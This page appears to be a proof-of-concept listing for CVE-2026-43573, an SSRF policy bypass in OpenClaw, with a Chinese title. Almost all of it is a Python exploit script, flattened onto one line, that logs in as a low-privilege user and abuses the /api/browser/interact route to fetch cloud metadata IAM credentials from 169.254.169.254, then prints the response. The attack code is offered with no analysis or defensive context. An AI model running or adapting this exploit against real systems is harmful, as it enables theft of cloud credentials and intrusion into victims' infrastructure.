CVE-2026-43573 OpenClaw SSRF策略绕过漏洞

import requests # Exploit for CVE-2026-43573: OpenClaw SSRF Policy Bypass # Description: Bypasses SSRF guards by utilizing existing-session browser interaction routes. target_host = "http://vulnerable-openclaw-instance.com" attacker_controlled_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # 1. Establish a session (Low privilege required) session = requests.Session() login_data = {"username": "low_priv_user", "password": "password"} session.post(f"{target_host}/api/login", data=login_data) # 2. Prepare the payload using the vulnerable interaction route # The vulnerability lies in /api/browser/interact which reuses existing sessions # and fails to enforce navigation policies on the target URL. payload = { "url": attacker_controlled_url, "method": "GET", "session_id": session.cookies.get_dict().get('session_id') } # 3. Send the exploit request try: response = session.post(f"{target_host}/api/browser/interact", json=payload) if response.status_code == 200: print("[+] SSRF Policy Bypass Successful!") print("[+] Internal Resource Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")